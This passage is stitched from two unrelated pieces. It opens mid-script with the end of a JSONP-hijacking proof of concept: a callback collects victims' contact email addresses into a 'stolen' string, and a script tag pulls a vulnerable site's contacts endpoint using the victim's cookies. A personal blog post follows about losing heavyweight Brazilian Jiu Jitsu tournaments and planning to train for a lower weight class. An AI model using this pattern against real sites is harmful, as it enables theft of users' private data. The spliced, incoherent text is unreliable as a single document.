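  for (var i = 0; i < data.length; i++) { stolen += data[i].email + "\n"; }
  alert("Captured cross-domain:\n" + stolen);
}
</script>
<!-- The browser attaches the victim's cookies to this cross-domain request -->
<script src="http://vulnerable-site.example/contacts?callback=showContacts"></script>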

A Brazilian Jiu Jitsu Week

Update: Added a few pics below.

I've been a lot busier than normal the last week in preparation for a pair of Brazilian Jiu Jitsu (BJJ) tournaments. I took a few days off, let email/blog lapse a bit, and visited a couple of cool BJJ/MMA academies in the L.A. area. I met some really famous fighters along the way as well. Rorion Gracie, Rener Gracie, Travis Lutter, Valid Ismael, etc.

Anyway, last weekend I entered a relatively small tournament in the blue belt unlimited (221.5+ lbs) division. This is where the monsters go to play. Now I’m 6’2” / 270lbs, not small by any measure, so I figured I’d be OK. Also I’m fairly inexperienced compared to most blues in the competition, who are 3-4 years in while I’m only a year in. I like to compete just the same. To my utter astonishment, I was significantly outsized, being the small one of the bunch. I kid you not. The guy who beat me was about 320 lbs. I’m not used to being outweighed by 50lbs! And the guy who won was 343lbs. I couldn’t see the fight from my vantage point, face smashed into the mat, but I’m told I held my own fairly well. I could have won at a certain point, but didn’t capitalize. Ugh. A loss is a loss.

So this weekend I entered a really BIG tournament in the same division. Again, I was the small guy but more prepared and with fewer butterflies. Another guy there was 6’6”, 310 lbs, and well built. Whoa. In my fight I was fairly evenly matched size-wise, but I couldn’t take this guy off his feet. He was REALLY strong and my takedowns suck. He scored a takedown on me halfway through, but I’m pretty good about getting back up quickly. No extra points. I didn’t get submitted, which is something to be proud of I guess, but again a loss is a loss.

I’ve never been one to get discouraged, but it’s certainly frustrating. My tourney record (0-3) is pathetic and frankly I'm getting sick of getting my butt kicked. Both experiences pointed out exactly what I have to do moving forward in my training. No better way to test your skills than to throw yourself into the fire.

1) Time to get out of this weight division. Taking the next 6-9 months to get below 221 and not competing until then. This will make me a lot faster as well.

2) Work A LOT on take-downs.

3) Work on my technique and build a lot more stamina. This is key.

We’ll see how the next year goes.

Travis Lutter (UFC Fighter)

The view from the crowd

The view of a match from ground level